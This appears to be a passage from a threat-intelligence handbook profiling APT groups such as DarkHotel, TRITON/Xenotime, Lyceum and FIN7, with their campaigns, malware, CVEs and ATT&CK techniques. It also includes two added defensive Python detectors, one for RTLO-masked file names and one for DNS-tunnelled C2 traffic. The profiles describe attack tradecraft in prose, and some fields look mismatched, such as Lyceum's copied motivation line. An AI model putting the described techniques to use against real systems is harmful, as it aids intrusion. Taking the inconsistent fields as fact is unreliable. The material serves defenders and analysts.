Exploited vulnerabilities
• CVE-2015-5119
• CVE-2016-4117
• CVE-2014-0497
• CVE-2010-0188



Targeted Countries _
China, Japan, North Korea, Russia, South Korea, Taiwan

Assumed origin of the attacker: South Korea

CAMPAIGNS

Since at least 2007 - Precise attacks in hotels and wide spreading through P2P networks
The group gets its name from the fact that it used hotel networks in order to infect its targets: the group waits for the target to connect to the hotel's WiFi hotspot. Specific individuals are then presented with a fake update asking the user to download a specific package. This package is infected with a malware that gathers information about its victims. The group shows this fake update page to specific people, and as the users of the hotspot are identified by their room numbers, this shows that the group somehow possesses inside knowledge of the whereabouts of the hotel's clients. Once the malware is deployed, it tries to gain more significant knowledge about the machine it resides on, before deciding to deploy its final stage.

These extremely targeted attacks contrast with another technique used by the group: infecting torrents with malware. This attack specifically targets Japanese users, as the names of the files suggest.

The group also uses more traditional techniques such as spear-phishing, specifically targeting the defense industry, NGOs and governmental organizations. The group was helped by two 0-days, now tracked as CVE-2010-0188 and CVE-2014-0497. The group has used valid certificates in order to sign its malware. These certificates are likely stolen or abused due to their weak cryptographic properties.

Attacks in 2015 - DarkHotel enhances its techniques
In 2015, the group, while continuing to use its old techniques, put more emphasis on malicious attachments, using HTA files in order to infect its victims. The group also used RAR files containing executable SCR files that use the RTLO technique to mask their extensions. In April 2015, the group used a recently leaked Flash zero-day belonging to the "Hacking Team" group in order to infect new victims.

Attacks since 2016 - New exploits and overlap with ATK4
In April 2016, the DarkHotel group started using CVE-2016-4117 and hosting it on a compromised web server, "scarcroft.net". The attacker group ATK4 started hosting some of its malware on that website too in late May 2016. While it was first supposed that the two groups were the same, increasing the confusion on the attribution of the DarkHotel group, it is now clear that these attackers are distinct, and that ATK4 might have been monitoring DarkHotel. Another infrastructure overlap happened in 2018, when DarkHotel and ATK4 compromised the same victim.

In 2018, the group also used the zero-day CVE-2018-8373, a vulnerability in the Windows VBScript engine, in order to attack Chinese trade executives. The group is still active in 2019 and led a campaign against political organizations in North East Asia.

Timeline (from the campaign chart):
• Jan-2007: Precise attacks in hotels and wide spreading through P2P networks
• May-2015: Attacks in 2015
• Jan-2016: New exploits and overlap with ATK4
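As an added example (not code from the handbook or from any vendor report), the following Python screens the member names of an incoming RAR/ZIP attachment for the RTLO extension-masking trick and the SCR/HTA lures described above: it strips Unicode bidirectional override characters to recover the extension Windows will actually execute, and reconstructs the name a user would see. The sample archive listing is constructed.

```python
"""Flag archive member names that hide an executable extension with RTLO.

The RTLO trick: a name such as "photo_<U+202E>gpj.scr" is rendered as
"photo_rcs.jpg" by a bidi-aware file dialog, but the OS still opens it as
a .scr screensaver executable. Detection is done on the raw code points.
"""

# Unicode bidirectional control characters that can reorder displayed text.
BIDI_OVERRIDES = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
}

# Extensions that lure files dress up as documents (constructed list).
EXECUTABLE_EXTS = {"scr", "exe", "hta", "com", "pif", "bat", "cmd", "js", "vbs", "lnk"}


def real_extension(name: str) -> str:
    """Extension the OS uses: text after the last dot, bidi controls ignored."""
    clean = "".join(c for c in name if c not in BIDI_OVERRIDES)
    return clean.rsplit(".", 1)[-1].lower() if "." in clean else ""


def displayed_name(name: str) -> str:
    """Approximate what a user sees: everything after an RLO is reversed."""
    if "\u202e" not in name:
        return "".join(c for c in name if c not in BIDI_OVERRIDES)
    head, tail = name.split("\u202e", 1)
    tail = "".join(c for c in tail if c not in BIDI_OVERRIDES)
    return head + tail[::-1]


def analyse_member(name: str) -> dict:
    """Classify one archive member name and list why it is suspicious."""
    reasons = []
    if any(c in BIDI_OVERRIDES for c in name):
        reasons.append("bidi-override-in-name")
    ext = real_extension(name)
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable-extension:{ext}")
    return {
        "raw": name,
        "displayed_as": displayed_name(name),
        "real_extension": ext,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


def scan_archive_listing(names):
    """Return the analyses of the members that should be held for review."""
    return [a for a in (analyse_member(n) for n in names) if a["suspicious"]]


# Constructed sample listing, modelled on the RAR-with-SCR lure in the text.
SAMPLE_LISTING = [
    "agenda.docx",
    "photo_\u202egpj.scr",   # displayed as "photo_rcs.jpg", executes as .scr
    "invitation.hta",
    "notes.txt",
]

if __name__ == "__main__":
    for hit in scan_archive_listing(SAMPLE_LISTING):
        print(hit["displayed_as"], "->", hit["real_extension"], hit["reasons"])
```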


MODUS OPERANDI (ATT&CK FRAMEWORK)


Initial Access
• T1091 - Replication Through Removable Media
• T1189 - Drive-by Compromise
• T1193 - Spearphishing Attachment

Execution
• T1064 - Scripting
• T1170 - Mshta
• T1203 - Exploitation for Client Execution
• T1204 - User Execution

Persistence
• T1023 - Shortcut Modification
• T1060 - Registry Run Keys / Startup Folder

Privilege Escalation
• T1068 - Exploitation for Privilege Escalation

Defense Evasion
• T1027 - Obfuscated Files or Information
• T1036 - Masquerading
• T1140 - Deobfuscate/Decode Files or Information
• T1064 - Scripting
• T1170 - Mshta
• T1116 - Code Signing

Credential Access
• T1056 - Input Capture
• T1145 - Private Keys

Discovery
• T1016 - System Network Configuration Discovery
• T1057 - Process Discovery
• T1063 - Security Software Discovery
• T1082 - System Information Discovery

Lateral Movement
• T1080 - Taint Shared Content
• T1091 - Replication Through Removable Media

Collection
• T1056 - Input Capture

Alias _
• ATK91
• TEMP.VELES
• TRITON GROUP
• XENOTIME

Score: 59

Threat Actor _
Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown

Targeted Sectors _
Energy

Motivations & Objectives _
Unknown

Language
Unknown

DESCRIPTION
TRITON is an attack framework allowing the manipulation of the safety systems of Industrial Control Systems (ICS) in critical infrastructures. It was discovered at the end of 2017 when it caused an accidental shutdown of the machines. FireEye has attributed the development of TRITON to a Muscovite research institute linked to the Russian government. The attacker's tools and TTPs indicate that it is prepared to conduct operations that can last several years and require long preparation. In the 2017 attack, the group compromised the target's network almost a year before reaching the SIS (Safety Instrumented System). During this period, priority seems to have been given to operational safety. Its lack of "curiosity" during the operation may indicate that the attacker is waiting for something before acting visibly.

A particular international context
This initial attack on Saudi interests by a group whose origin appears to be Russian is taking place in an unusual international context. It should be recalled that since the end of 2017, Russia and Saudi Arabia have been moving closer together on the diplomatic front. However, if we look at the sector targeted, namely oil, we must remember that since 2014 and the annexation of Crimea, pressure from the West on Russia has been added to the fall in world oil prices, which has plunged Russia into a recession. To stimulate investment, the Kremlin had to find capital and foreign exchange. For this reason, Russia has moved closer to Saudi Arabia, whose alliance with the United States had weakened under the Obama era in the wake of the Iranian nuclear agreement, supported by the former US President. On 1 January 2017, the two countries decided to reduce oil production volumes to 1.8 million barrels/day in order to increase the price of black gold. The Triton attack at the end of 2017 took place 9 months later, when King Salman travelled to Moscow (November 2017) to prepare for the next OPEC+ meeting, which was supposed to lead to a further reduction in production after March 2018. Nevertheless, the last 9 months have been marked by two important events that have redefined everyone's interests. The change in the US position in favour of Saudi Arabia during the Trump era, by denouncing the Iranian nuclear agreement, and the Gulf crisis of June 2017, which increased tension between the Kingdom and its Shiite alter ego, weakened relations between Russia and the Saudis. After the meeting of the two leaders and the attack on Saudi Arabia that paralyzed its oil company, Triton launched new attacks in 2018 in the Middle East region and against the United States. Good relations between Saudi Arabia and Russia were reconfirmed in the second week of June 2018, when Saudi Arabia and Russia agreed to stabilize oil prices at an average level of 75 dollars per barrel, while King Ben Salman and President Putin were meeting in Moscow for the opening of the Football World Cup, which took place on the 14th.

It should be noted that according to Dragos, the Triton group (Xenotime) is undoubtedly one of the most dangerous groups known to date, since it attacks industrial safety systems almost exclusively with destructive intent involving loss of human life.



Targeted Countries _
Saudi Arabia

Assumed origin of the attacker: Russia

CAMPAIGNS

Campaign leveraging the Triton malware
In late 2017, an oil and gas facility in Saudi Arabia suffered downtime due to infection by a malware strain that was able to interface with industrial control systems in the facility. This malware was targeting Schneider's Triconex Safety Instrumented System. It is believed that the group shut down the facility inadvertently, as some controllers shut themselves down when their logic code failed a validation check. Such an attack requires high technical knowledge and, while the attack is probably not massively reproducible, it shows that the attacker is capable enough to attack and potentially cause physical damage to factories and industrial systems.

Some other intrusions took place at undisclosed dates by this attacker in the Middle East, focusing on oil and gas companies until late 2018, when the group also started probing energy systems in the United States, amongst other countries.

Timeline (from the campaign chart):
• Jan-2017: Campaign leveraging the Triton malware

TOOLS, MALWARES AND VULNERABILITIES

Malwares
• Cryptcat
• Triton/Trisis
• SecHack

Legitimate software
• Mimikatz
• Plink

Exploited vulnerabilities
• None


MODUS OPERANDI (ATT&CK FRAMEWORK)


Initial Access
• T1078 - Valid Accounts

Execution
• T1053 - Scheduled Task

Persistence
• T1053 - Scheduled Task
• T1078 - Valid Accounts
• T1100 - Web Shell
• T1183 - Image File Execution Options Injection

Privilege Escalation
• T1053 - Scheduled Task
• T1078 - Valid Accounts
• T1100 - Web Shell
• T1183 - Image File Execution Options Injection

Defense Evasion
• T1036 - Masquerading
• T1078 - Valid Accounts
• T1099 - Timestomp
• T1183 - Image File Execution Options Injection

Credential Access
• T1003 - Credential Dumping

Discovery
• T1087 - Account Discovery
• T1135 - Network Share Discovery

Lateral Movement
• T1076 - Remote Desktop Protocol

Collection
• T1119 - Automated Collection

Command and Control
• T1032 - Standard Cryptographic Protocol
• T1043 - Commonly Used Port
• T1065 - Uncommonly Used Port

Exfiltration
• T1022 - Data Encrypted
• T1048 - Exfiltration Over Alternative Protocol

Alias _
• ATK33
• PLATINUM
• TWOFORONE

Score: 58

Threat Actor _
Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown

Targeted Sectors _
Communication, Defence, Financial Services, Government Agencies, International Organizations, Military

Motivations & Objectives _
Theft of intellectual property

Language
Unknown

DESCRIPTION
PLATINUM is a cyber espionage group active since at least 2009. Its activities are distinctly different not only from those typically seen in untargeted attacks, but from many targeted attacks as well. A large share of targeted attacks can be characterized as opportunistic: the activity group changes its target profiles and attack geographies based on geopolitical seasons and may attack institutions all over the world. Like many such groups, PLATINUM seeks to steal sensitive intellectual property related to government interests, but its range of preferred targets is consistently limited to specific governmental organizations, defence institutes, intelligence agencies, diplomatic institutions, and telecommunication providers in South and Southeast Asia. The group's persistent use of spear phishing tactics (phishing attempts aimed at specific individuals) and access to previously undiscovered zero-day exploits have made it a highly resilient threat. Unlike APT1, this group does not conduct many infections but focuses on a small number of campaigns per year. It often targets the private email accounts of its victims and uses them to access the organization's networks.

It uses custom-developed tools which are often updated to avoid detection. Its backdoors are configured to work during the victim's working hours so as to hide their network traffic within legitimate traffic. The group uses compromised infrastructure based in multiple countries. In June 2018, Kaspersky detected an ongoing campaign targeting diplomatic, government and military entities conducted by PLATINUM. The group used a new steganography technique to hide its communications.

CAMPAIGNS

Platinum: EasternRoppels Campaign
EasternRoppels is a campaign that may have started in 2012, targeting the Communication, Defence, Financial Services, Government Agencies, International Organizations, and Military sectors in Southeast Asia.

Timeline (from the campaign chart):
• Jan-2012: Platinum: EasternRoppels Campaign

TOOLS, MALWARES AND VULNERABILITIES

Malwares
• Eadbupd
• JPIN
• Dipsind
• Hot patcher
• ATMsol

Legitimate software
• None

Exploited vulnerabilities
• CVE-2015-2545
• CVE-2013-1331
• CVE-2013-7331
• CVE-2015-2546



Targeted Countries _
China, India, Indonesia, Malaysia, South Asia, Southeast Asia

Assumed origin of the attacker: Unknown

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
• T1189 - Drive-by Compromise
• T1193 - Spearphishing Attachment

Execution
• T1047 - Windows Management Instrumentation
• T1086 - PowerShell
• T1204 - User Execution

Persistence
• T1179 - Hooking

Privilege Escalation
• T1055 - Process Injection
• T1068 - Exploitation for Privilege Escalation
• T1179 - Hooking

Defense Evasion
• T1036 - Masquerading
• T1055 - Process Injection

Credential Access
• T1003 - Credential Dumping
• T1056 - Input Capture
• T1179 - Hooking

Lateral Movement
• T1105 - Remote File Copy

Collection
• T1056 - Input Capture

Command and Control
• T1001 - Data Obfuscation
• T1094 - Custom Command and Control Protocol
• T1095 - Standard Non-Application Layer Protocol
• T1105 - Remote File Copy

Exfiltration
• T1029 - Scheduled Transfer

Alias _
• ATK23
• DAGGER PANDA
• ICE FOG

Score: 56

Threat Actor _
Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown

Targeted Sectors _
Aerospace, Defence, Government Agencies, High-Tech, Maritime

Motivations & Objectives _
Espionage

Language
Chinese

DESCRIPTION
Icefog is a Chinese cyber espionage group active since at least 2011. This group is described by Kaspersky as "small, with a relative lack of complexity", but it successfully compromised its targets, which are mostly defence contractors, industrial companies, shipbuilding companies, telecommunication operators and media in Japan, Taiwan and South Korea. After the Kaspersky reports from September 2013 and January 2014, the group disappeared. In 2015, after nearly a year of silence, new variants of ICEFOG (ICEFOG-M and ICEFOG-P) were found, used during campaigns whose targets do not match those of previously seen campaigns. According to the researcher Chi-en Shen from FireEye, the new variants of the ICEFOG backdoor are used by multiple Chinese groups (APT9, APT15, Goblin Panda and another group named "Temp Group A", which may be the original Icefog group). The conclusion is that the ICEFOG backdoor cannot be used to attribute a campaign.

CAMPAIGNS

Icefog campaign against Japan, South Korea and Taiwan between 2011 and 2013
In 2011 it targeted the Japanese House of Representatives and the House of Councillors. During this period an APT campaign that focused on the supply chain, targeting government institutions, military contractors, maritime and ship-building groups, was also discovered. The group targeted Japan, South Korea and Taiwan.

NB: In 2014, Kaspersky published a report on Icefog which prompted the attacker to develop new versions of the malware. Nevertheless, these new versions have been used by other groups in many campaigns and therefore cannot be linked to the original group, since it is not necessarily possible to determine whether it is the same group or another.

Timeline (from the campaign chart):
• Jan-2011: Icefog campaign against Japan, South Korea and Taiwan between 2011 and 2013

TOOLS, MALWARES AND VULNERABILITIES

Malwares
• ICEFOG
• JavaFog
• MacFog

Legitimate software
• CABARC
• WinRAR

Exploited vulnerabilities
• CVE-2012-0158
• CVE-2012-1856
• CVE-2012-1723
• CVE-2013-0422



Targeted Countries _
Japan, South Korea, Taiwan

Assumed origin of the attacker: China

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
• T1192 - Spearphishing Link
• T1193 - Spearphishing Attachment

Execution
• T1064 - Scripting
• T1204 - User Execution

Persistence
• T1038 - DLL Search Order Hijacking

Privilege Escalation
• T1038 - DLL Search Order Hijacking

Defense Evasion
• T1038 - DLL Search Order Hijacking
• T1140 - Deobfuscate/Decode Files or Information
• T1064 - Scripting

Discovery
• T1016 - System Network Configuration Discovery
• T1083 - File and Directory Discovery

Collection
• T1005 - Data from Local System

Command and Control
• T1043 - Commonly Used Port
• T1065 - Uncommonly Used Port
• T1071 - Standard Application Layer Protocol

Exfiltration
• T1002 - Data Compressed
• T1030 - Data Transfer Size Limits

Alias _
• ATK120
• HEXANE
• LYCEUM

Score: 55

Threat Actor _
Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown

Targeted Sectors _
Energy

Motivations & Objectives _
Attacks on industrial safety systems almost exclusively with destructive intent

Language
Unknown

DESCRIPTION
The ATK120 threat group (Lyceum, Hexane) targets organizations in sectors of strategic national importance, including oil and gas and possibly telecommunications. LYCEUM may have been active as early as April 2018. Domain registrations suggest that a campaign in mid-2018 focused on South African targets. In May 2019, the threat group launched a campaign against oil and gas organizations in the Middle East. This campaign followed a sharp uptick in development and testing of their toolkit against a public multi-vendor malware scanning service in February 2019. Its core targeting is very similar to that of the APT Xenotime (ATK91), and some similarities can be found with Magnallium and Chrysene. No definitive links can be established.

TOOLS, MALWARES AND VULNERABILITIES

Malwares and tools: DanBot, DanDrop, kl.ps1, Decrypt-RDCMan.ps1, Get-LAPSP.ps1
Exploited vulnerabilities: None

DanBot
A first-stage remote access trojan (RAT) that uses DNS- and HTTP-based communication mechanisms and provides basic remote access capability, including the abilities to execute arbitrary commands via cmd.exe and to upload and download files. DanBot is written in C# using .NET Framework 2.0. The DNS channel of DanBot's C2 protocol uses both IPv4 A records and IPv6 AAAA records for communication. The HTTP channel has evolved slightly since the early 2018 samples but retains common elements throughout.

DanDrop
ATK120 uses this malicious macro to extract the DanBot payload from the weaponized document and then Base64-decode and install the malware using a scheduled task. The basic form and function of the macro have remained constant across analyzed samples, but the threat actors have made incremental improvements to obfuscate the macro and refactor some of the functionality.

kl.ps1
kl.ps1 is a custom keylogger written in PowerShell that leverages elements of the Microsoft .NET Core framework. It captures the window title and keystrokes on infected systems and stores them as Base64-encoded data. It is deployed using a scheduled task and a VBScript file.

Decrypt-RDCMan.ps1
Decrypt-RDCMan.ps1 is a component of the PoshC2 penetration testing framework. It is used to decrypt passwords stored in the RDCMan configuration file, which stores details of servers and encrypted credentials to quickly establish remote desktop sessions. Recovered credentials could give the threat actors additional access within the environment. LYCEUM deployed this tool via DanBot approximately one hour after gaining initial access to a compromised environment.

Get-LAPSP.ps1
Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP. It appears to contain borrowed code and has been run through an obfuscation script such as Invoke-Obfuscation. LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment.
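DanBot's DNS channel carries its C2 traffic in A and AAAA lookups of names under an attacker-controlled domain. The heuristic below is an added example, not code from the handbook or from the Secureworks analysis it summarises: it groups DNS query logs by client and registered domain and flags a domain when a single host has resolved many distinct, high-entropy subdomains under it using both record types. The log format, the thresholds and every sample record are constructed for illustration.

```python
"""Heuristic detector for DNS-based C2 of the kind the DanBot description above
attributes to ATK120: many unique, high-entropy subdomains under one domain,
queried as both A and AAAA records from the same client.

Added example, not code from the handbook or from the Secureworks analysis it
summarises. Log format, thresholds and all sample records are constructed.
"""
import math
from collections import defaultdict

# Constructed sample log: "<timestamp> <client_ip> <qname> <qtype>".
SAMPLE_LOG = """\
2019-08-12T09:00:01Z 10.0.0.15 www.example.org A
2019-08-12T09:00:02Z 10.0.0.15 www.example.org AAAA
2019-08-12T09:00:03Z 10.0.0.15 mail.example.org A
2019-08-12T09:01:00Z 10.0.0.23 q3k9v2m8x1a7.c2-example.net A
2019-08-12T09:01:01Z 10.0.0.23 z8p1w4n6y0b3.c2-example.net AAAA
2019-08-12T09:01:02Z 10.0.0.23 h5t2r9k7l1c4.c2-example.net A
2019-08-12T09:01:03Z 10.0.0.23 m0v6x3j8q2d9.c2-example.net AAAA
2019-08-12T09:01:04Z 10.0.0.23 b7n4s1f5w9e2.c2-example.net A
2019-08-12T09:01:05Z 10.0.0.23 k2y8u5g0p3f6.c2-example.net AAAA
2019-08-12T09:02:00Z 10.0.0.42 cdn1.static-example.com A
2019-08-12T09:02:01Z 10.0.0.42 cdn2.static-example.com A
"""


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Parse the constructed '<ts> <client> <qname> <qtype>' format into tuples."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip blank or malformed lines
        ts, client, qname, qtype = parts
        records.append((ts, client, qname.lower().rstrip("."), qtype.upper()))
    return records


def registered_domain(qname):
    """Approximation: the last two labels. Production code should use the Public Suffix List."""
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def find_dns_c2_candidates(records, min_unique=5, min_entropy=3.0, require_a_and_aaaa=True):
    """Return (client, domain) pairs whose subdomain pattern looks like a tunnelled channel."""
    groups = defaultdict(lambda: {"subdomains": set(), "qtypes": set()})
    for _ts, client, qname, qtype in records:
        base = registered_domain(qname)
        if qname == base:
            continue  # apex lookups carry no encoded data
        leftmost = qname[: -(len(base) + 1)]
        g = groups[(client, base)]
        g["subdomains"].add(leftmost)
        g["qtypes"].add(qtype)

    findings = []
    for (client, base), g in sorted(groups.items()):
        subs = g["subdomains"]
        if len(subs) < min_unique:
            continue
        mean_entropy = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if mean_entropy < min_entropy:
            continue
        if require_a_and_aaaa and not {"A", "AAAA"} <= g["qtypes"]:
            continue
        findings.append({"client": client, "domain": base, "unique_subdomains": len(subs),
                         "mean_label_entropy": round(mean_entropy, 2),
                         "qtypes": sorted(g["qtypes"])})
    return findings


if __name__ == "__main__":
    for hit in find_dns_c2_candidates(parse_log(SAMPLE_LOG)):
        print(hit)
```

The AAAA requirement is deliberately optional: DanBot is documented as using both record types, but a channel that only uses TXT or AAAA responses would be missed if it were mandatory, so tune `require_a_and_aaaa` and the thresholds to the resolver logs at hand rather than treating them as fixed indicators.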



Targeted countries: Africa, Central Asia, Kuwait, Middle East, South Africa
Assumed origin of the attacker: Unknown

CAMPAIGNS

ATK120 (Lyceum, Hexane) targets the energy sector in South Africa (2018)
The Secureworks Counter Threat Unit Research Team indicates that LYCEUM may have been active as early as April 2018. Domain registrations suggest that a campaign in mid-2018 focused on South African targets.

ATK120 (Lyceum, Hexane) targets oil and gas companies in the Middle East (August 2019)
In August 2019 ATK120 targeted oil and gas companies in the Middle East, with Kuwait as a primary operating region. However, ATK120's area of intervention extends to other regions, as it has targeted telecommunications providers in the Greater Middle East, Central Asia and Africa, potentially as a stepping stone to network-focused man-in-the-middle and related attacks.

MODUS OPERANDI (ATT&CK FRAMEWORK)

Discovery: T1087 - Account Discovery
Lateral Movement: T1076 - Remote Desktop Protocol
Collection: T1056 - Input Capture
Command and Control: T1043 - Commonly Used Port; T1071 - Standard Application Layer Protocol

Alias: APT-C-38, ATK112, ZOOPARK
Score: 54
Threat actor type: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Media, Political Organizations
Motivations & objectives: Espionage
Language: Unknown

DESCRIPTION
ATK112 is a group that mostly uses an Android malware, “UnitMM”, which has gone through multiple iterations. This group was first noticed in June 2015 and is still active to this day. The group mostly focuses on espionage and has made technical progress since its debut: while it first used forked commercial software to accomplish its deeds, the group extended it and brought it to a fully-fledged espionage platform. According to 360 Beaconlab, however, the group purchases its malicious software from a commercial development group nicknamed “Apasec”. The group deploys its tools through its main vectors: Telegram channels and watering holes. Indeed, it regularly uses compromised websites in order to gain access to its targets. The group also started using an exclusive Windows malware, nicknamed “SpecialSaber”.

CAMPAIGNS

APT-C-38 targets the Middle East since 2015 (January 2015)
Since 2015 APT-C-38 has focused on specific geographic zones in the Middle East, as can be seen from the theme of some infected Android applications and the compromised websites, notably:
- The Iranian Kurdistan province (infected fake polling app)
- Iraqi Kurdistan (infected fake referendum app)
- Egypt (compromised news website)
- Lebanon and Jordan (compromised Arabic news website, especially popular in these countries)
- Kuwait (compromised news website)

TOOLS, MALWARES AND VULNERABILITIES

Malwares: SpecialSaber, UnitMM
Legitimate software: None
Exploited vulnerabilities: None



Targeted countries: Egypt, Iran, Iraq, Jordan, Kurdistan, Kuwait, Lebanon, Middle East, Morocco
Assumed origin of the attacker: Unknown

MODUS OPERANDI (ATT&CK FRAMEWORK)

Defense Evasion: T1089 - Disabling Security Tools
Credential Access: T1056 - Input Capture; T1003 - Credential Dumping
Discovery: T1057 - Process Discovery; T1083 - File and Directory Discovery
Collection: T1056 - Input Capture; T1113 - Screen Capture; T1114 - Email Collection; T1074 - Data Staged
Command and Control: T1043 - Commonly Used Port
Exfiltration: T1022 - Data Encrypted; T1041 - Exfiltration Over Command and Control Channel

Alias: APT-C-27, ATK80, GOLDMOUSE, GOLDEN RAT
Score: 52
Threat actor type: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Unknown
Motivations & objectives: Espionage
Language: Unknown

DESCRIPTION
ATK80 (APT-C-27, GoldMouse or Golden Rat) is a threat actor active since at least November 2014. It launched targeted long-term attacks against organizations in the Syrian region using Android and Windows malwares. Its objective is the theft of sensitive information. Its malwares are mainly disguised as common chat software such as ChatSecure, WhatsApp or Telegram. It also uses njRat, an open-source Remote Access Trojan created in 2012 and often used against targets in the Middle East.

The initial access techniques include the creation of fake websites, helped by typosquatting, used to lead the user to download the malicious messaging app. The group also used social media such as Facebook to induce users to download the malicious software from a specified link. Its Android spyware is able to record audio, take photographs, track GPS position, upload contacts, call records, SMS and files, execute commands received from the cloud, etc. These capabilities allow the attacker to efficiently track a person.

Focus on the international context
There are several indications that this group, linked to Iran, is serving the international interests of the Shia Islamic Republic. It should be recalled that Iran, in a context of cold war with Saudi Arabia, has been involved in the Syrian conflict (as have many other countries). By supporting the power of President Bashar Al-Assad, the Islamic Republic wishes to consolidate the Shia arc that connects Iran to the Mediterranean Sea through Iraq, Alawi Syria (a Shia branch) and Lebanon through Hezbollah.

The characteristics of the group seem to indicate a match of interests:
- First, the start dates of the group's activities are evocative. November 2014 corresponds to a period when the danger that DAESH represented for President Bashar Al-Assad's effort to strengthen his power was confirmed. Countering DAESH and the rebels makes it possible to consolidate the Shiite hold on the country, especially when we know that until June 2015 the Syrian regime suffered several military failures. In addition, on 7 October 2015, General Hossein Hamadani, a very influential figure among the Guards of the Islamic Revolution, was killed by Daesh according to the Iranian government.
- Secondly, the modus operandi of prioritizing the infiltration of messaging applications known to be used by both terrorists and rebels constitutes a second set of objectives. It is a question of espionage on the opponents of the Syrian President.

CAMPAIGNS
This group attacks in waves:

October 2014 - July 2015
Attacks against Syria using njRat and Downloader, plus AndroRAT for Android devices.

July 2015 - November 2016
Attacks using DarkComet, VBS Backdoor, AndroRAT and multiple types of payloads.

December 2016 - July 2018
Attacks using a custom Android RAT, a custom Windows RAT and a JavaScript backdoor.

March 2019
The group started to use the WinRAR vulnerability (CVE-2018-20250) to install an embedded njRat on a vulnerable computer.

The language used in the malwares and in the lure documents is Arabic. The lure documents are about terrorist attacks, a sensitive subject in the Middle East region, and other themes that can easily arouse user curiosity.

TOOLS, MALWARES AND VULNERABILITIES

Malwares: Android RAT, DarkComet, JS Backdoor, njRat, VBS Backdoor, Windows RAT
Legitimate software: None
Exploited vulnerabilities: CVE-2018-20250



Targeted countries: Middle East, Syria
Assumed origin of the attacker: Iran

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access: T1192 - Spearphishing Link; T1193 - Spearphishing Attachment; T1194 - Spearphishing via Service
Execution: T1204 - User Execution
Defense Evasion: T1107 - File Deletion; T1102 - Web Service; T1045 - Software Packing; T1112 - Modify Registry; T1140 - Deobfuscate/Decode Files or Information; T1027 - Obfuscated Files or Information
Collection: T1113 - Screen Capture
Command and Control: T1065 - Uncommonly Used Port; T1071 - Standard Application Layer Protocol; T1102 - Web Service
Exfiltration: T1002 - Data Compressed

Mobile ATT&CK: T1476 - Deliver Malicious App via Other Means; T1401 - Abuse Device Administrator Access to Prevent Removal; T1437 - Standard Application Layer Protocol; T1412 - Capture SMS Messages; T1430 - Location Tracking; T1432 - Access Contact List; T1429 - Microphone or Camera Recordings; T1481 - Web Service; T1433 - Access Call Log

Alias: ATK32, CARBANAK (?), FIN7, AG-CR1
Score: 52
Threat actor type: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Casino & Gaming, Communication, Education, Energy, Financial Services, High-Tech, Hospitality, Retail
Motivations & objectives: Personal gain
Language: Unknown

DESCRIPTION
FIN7 is a financially motivated group that has been active since at least 2013 and primarily targets the retail, hospitality and restaurant sectors, mainly in the U.S. There are assumptions that this is the same group as Carbanak, but it appears that these are two separate groups using similar tools, and they are therefore currently tracked separately. Its main goal is to steal financial assets from companies, such as debit cards, or to get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts. The group often uses phishing as its main attack vector, including tailored spear-phishing campaigns. In addition, the group used a front company dubbed “Combi Security”, purportedly headquartered in Russia and Israel, to provide a guise of legitimacy and to recruit hackers to join the criminal enterprise.

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: HalfBaked, PowerSource, TextMate, SQLRat, DNSbot, Bateleur
Tools used by multiple adversaries: Carbanak, AveMaria
Publicly available tools: Cobalt Strike, TinyMet
Legitimate software: Microsoft Office
Exploited vulnerabilities: CVE-2017-11882



Targeted countries: Australia, France, Malta, United Kingdom, United States
Assumed origin of the attacker: Russia

CAMPAIGNS

February 2017 - US-SEC filings
The group carried out a campaign targeting United States Securities and Exchange Commission (SEC) filings at various organizations. The campaign used spear-phishing methods against personnel involved with the US-SEC filings.

March 2017 - Fileless malware campaigns
The group was associated with two campaigns targeting financial institutions, government agencies and other enterprises. The campaigns used fileless malware and known penetration testing tools and utilities.

April 2017 - Hidden shortcut files
In a new campaign, the group modified its phishing techniques, initiating the infection using phishing lures that implemented hidden shortcut (LNK) files to avoid detection. The attack then used VBScript to infect the victim. This method replaced the previous use of weaponized Microsoft Office macros.

June 2017 - Evasive restaurant campaign
A sophisticated fileless attack was identified on June 7, 2017, targeting restaurants across the US, seizing system control and installing a backdoor to steal financial information. The campaign incorporated new evasion techniques, bypassing both signature- and behavior-based security mechanisms.

2017 - Carbanak
Attacks carried out by the group were found to install the CARBANAK backdoor for persistent access. The attacks leveraged an application shim database to inject a malicious in-memory patch into the “services.exe” process, and then spawn a CARBANAK backdoor process.

October 2017 - Banks and enterprises
Another campaign took place between October 8 and 10, 2017, targeting banks and enterprises. Like previous campaigns, this attack also bypassed most security solutions.

2018 - High-profile breaches
A campaign by the group was identified, breaching several high-profile American companies. Reportedly over five million credit and debit card numbers were affected by the breach.

November 2018
Two new campaigns were identified in the first two weeks of November 2018. The attacks resembled previous campaigns by the group but included small variations in order to bypass security vendors.

March 2019
After the arrest of suspected high-ranking members of the group in August 2018, the group resumed its activities with a new set of administrator tools and never-before-seen forms of malware. This campaign included phishing emails with malicious attachments containing SQLRat. This technique had not been seen before in FIN7 tactics.
